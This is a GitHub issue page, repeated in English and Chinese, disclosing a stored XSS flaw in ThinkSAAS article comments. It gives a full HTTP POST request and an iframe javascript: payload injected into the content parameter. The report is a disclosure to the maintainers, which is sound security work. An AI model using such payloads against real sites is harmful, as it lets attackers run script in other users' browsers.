We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Storage type XSS(Need to register and log in) When the article is published: POST /index.php?app=article&ac=comment&ts=do HTTP/1.1 Host: demo.thinksaas.cn Connection: close Content-Length: 178 Cache-Control: max-age=0 Origin: https://demo.thinksaas.cn Upgrade-Insecure-Requests: 1 User-Agent: Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Referer: https://demo.thinksaas.cn/article/show/395/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie:
content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421
Add an attack poc:<iframe src=javascript:alert('success');height=0 width=0 /><iframe> to the %2Fp%3E after the content parameter
Official return:https://demo.thinksaas.cn/article/show/395/
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
存储型xss(需要注册登录) 发表文章时: POST /index.php?app=article&ac=comment&ts=do HTTP/1.1 Host: demo.thinksaas.cn Connection: close Content-Length: 178 Cache-Control: max-age=0 Origin: https://demo.thinksaas.cn Upgrade-Insecure-Requests: 1 User-Agent: Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Referer: https://demo.thinksaas.cn/article/show/395/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie:
在content参数后%2Fp%3E添加攻击poc:<iframe src=javascript:alert('success');height=0 width=0 /><iframe>
官方复现:https://demo.thinksaas.cn/article/show/395/
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Storage type XSS(Need to register and log in)
When the article is published:
POST /index.php?app=article&ac=comment&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 178
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/article/show/395/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:
content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421
Add an attack poc:<iframe src=javascript:alert('success');height=0 width=0 /><iframe> to the %2Fp%3E after the content parameter
Official return:https://demo.thinksaas.cn/article/show/395/
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
存储型xss(需要注册登录)
发表文章时:
POST /index.php?app=article&ac=comment&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 178
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/article/show/395/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:
content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421
在content参数后%2Fp%3E添加攻击poc:<iframe src=javascript:alert('success');height=0 width=0 /><iframe>
官方复现:https://demo.thinksaas.cn/article/show/395/
The text was updated successfully, but these errors were encountered: